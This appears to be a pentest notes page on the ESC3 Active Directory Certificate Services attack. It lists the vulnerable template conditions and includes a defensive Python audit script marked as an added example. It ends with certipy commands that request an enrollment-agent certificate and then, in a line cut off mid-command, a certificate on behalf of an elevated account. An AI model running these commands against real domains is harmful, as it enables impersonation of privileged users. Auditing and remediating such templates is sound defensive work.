ESC3
TL;DR
ESC3 allows you to request a certificate that can be used to request another certificate on behalf of any user, and then to use that second certificate for client authentication using Kerberos.
A template is vulnerable to ESC3 when it defines the Certificate Request Agent EKU, which allows requesting certificates from other templates on behalf of other principals.
A certificate template with the following configuration is vulnerable to ESC3:
The Enterprise CA grants enrollment rights to low-privileged users.
Manager approval is disabled.
No authorized signatures are required.
An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users.
The certificate template defines the Certificate Request Agent EKU.
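The five conditions listed above, expressed as an audit check that reports which control, if any, blocks ESC3 on a template (an added example, not part of the original page or of Certipy). It assumes the template attributes msPKI-Enrollment-Flag, msPKI-RA-Signature and pKIExtendedKeyUsage and the enrollment-right SIDs have already been exported into dictionaries; the function names, dictionary layout, template names and domain SID are constructed for illustration.

```python
AGENT_EKU = "1.3.6.1.4.1.311.20.2.1"     # Certificate Request Agent EKU OID
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # msPKI-Enrollment-Flag: manager approval
LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11"}  # Everyone, Authenticated Users
LOW_PRIV_RIDS = ("-513", "-515")         # Domain Users, Domain Computers


def low_priv(sids):
    """Return the SIDs that belong to broad, low-privileged groups."""
    return [s for s in sids if s in LOW_PRIV_SIDS
            or (s.startswith("S-1-5-21-") and s.endswith(LOW_PRIV_RIDS))]


def audit_esc3(template, ca_enroll_sids):
    """Return (vulnerable, controls_in_place) for the five conditions above."""
    controls = {
        "CA enrollment restricted": not low_priv(ca_enroll_sids),
        "manager approval required":
            bool(template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS),
        "authorized signatures required": template["msPKI-RA-Signature"] > 0,
        "template enrollment restricted": not low_priv(template["enroll_sids"]),
        "no Certificate Request Agent EKU":
            AGENT_EKU not in template["pKIExtendedKeyUsage"],
    }
    in_place = [name for name, ok in controls.items() if ok]
    return (not in_place, in_place)  # vulnerable only when no control blocks it


# Constructed sample data (hypothetical domain SID and template names).
DOM = "S-1-5-21-1111111111-2222222222-3333333333"
CA_ENROLL = ["S-1-5-11"]
TEMPLATES = [
    {"name": "AgentOpen", "msPKI-Enrollment-Flag": 0x29, "msPKI-RA-Signature": 0,
     "enroll_sids": [DOM + "-513"], "pKIExtendedKeyUsage": [AGENT_EKU]},
    {"name": "AgentApproval", "msPKI-Enrollment-Flag": 0x2B, "msPKI-RA-Signature": 0,
     "enroll_sids": [DOM + "-513"], "pKIExtendedKeyUsage": [AGENT_EKU]},
    {"name": "AgentAdminsOnly", "msPKI-Enrollment-Flag": 0x29, "msPKI-RA-Signature": 1,
     "enroll_sids": [DOM + "-512"], "pKIExtendedKeyUsage": [AGENT_EKU]},
]

if __name__ == "__main__":
    for t in TEMPLATES:
        vulnerable, in_place = audit_esc3(t, CA_ENROLL)
        print(t["name"], "VULNERABLE" if vulnerable else "blocked by: " + ", ".join(in_place))
```

Any single control in the returned list is enough to break the chain, so the output doubles as a remediation checklist for templates that carry the Certificate Request Agent EKU.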
Exploit
# Request a certificate using a domain account
certipy req -username [username]@[domain] -password [password] -ca [CA CN] -target [CA FQDN] -template [vuln template]
# Request a certificate using the .pfx output from the above command, with -on-behalf-of set to an elevated account
certipy req -u